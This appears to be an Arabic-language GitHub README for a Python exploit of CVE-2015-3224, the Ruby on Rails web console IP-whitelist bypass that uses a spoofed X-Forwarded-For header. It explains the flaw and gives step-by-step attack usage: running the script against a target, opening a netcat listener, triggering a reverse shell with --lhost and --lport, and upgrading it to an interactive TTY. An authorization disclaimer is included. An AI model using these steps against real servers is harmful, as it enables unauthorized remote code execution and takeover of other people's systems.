
استغلال وحدة تحكم ويب Ruby on Rails (CVE-2015-3224)
يحتوي هذا المستودع على نص برمجي بلغة Python لاستغلال ثغرة تجاوز القائمة البيضاء لعناوين IP في وحدة التحكم الخاصة بالمطور في Ruby on Rails 4.0.x و 4.1.x. يسمح النص البرمجي بـ تنفيذ أكواد عن بُعد على الخوادم الضعيفة.
⚠️ إخلاء مسؤولية هذا النص البرمجي لأغراض تعليمية واختبار الأمان المصرح به فقط. لا تستخدمه على أي نظام دون إذن صريح. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا النص البرمجي.
وحدة التحكم في الويب في الإصدارات الضعيفة من Ruby on Rails مخصصة لأغراض التطوير ويجب أن تكون متاحة فقط من عناوين IP موثوقة. ومع ذلك، بسبب المعالجة غير الصحيحة لرأس HTTP X-Forwarded-For، يمكن للمهاجم تزوير عنوان IP الخاص به ليظهر كمستخدم محلي موثوق (مثل 127.0.0.1 أو ::1). يؤدي ذلك إلى تجاوز القائمة البيضاء لعناوين IP ومنح وصول غير مصرح به إلى وحدة التحكم، مما يؤدي إلى تنفيذ أكواد عن بُعد.
requestsتثبيت requests:
pip install requests
استنساخ المستودع:
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
جعل النص البرمجي قابلاً للتنفيذ:
chmod +x exploit.py
هذا الوضع مفيد لتشغيل أوامر سريعة وبسيطة.
./exploit.py -t http://<TARGET_IP>:<PORT>
هذا هو الوضع الموصى به للحصول على صدفة مستقرة وتفاعلية بالكامل.
على جهازك المحلي، افتح محطة طرفية جديدة وشغّل مستمع netcat.
nc -lvnp 9001
في محطة طرفية أخرى، شغّل النص البرمجي مع العلامة --rev-shell، مع توفير عنوان IP المحلي (lhost) والمنفذ (lport).
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
سيصل اتصال إلى مستمع netcat الخاص بك. لترقيته إلى صدفة TTY تفاعلية بالكامل، اتبع هذه الخطوات في نافذة netcat:
Ctrl+Z.stty raw -echo; fg
Enter إذا لم يظهر الموجه مرة أخرى.reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
لديك الآن صدفة مستقرة وكاملة الوظائف!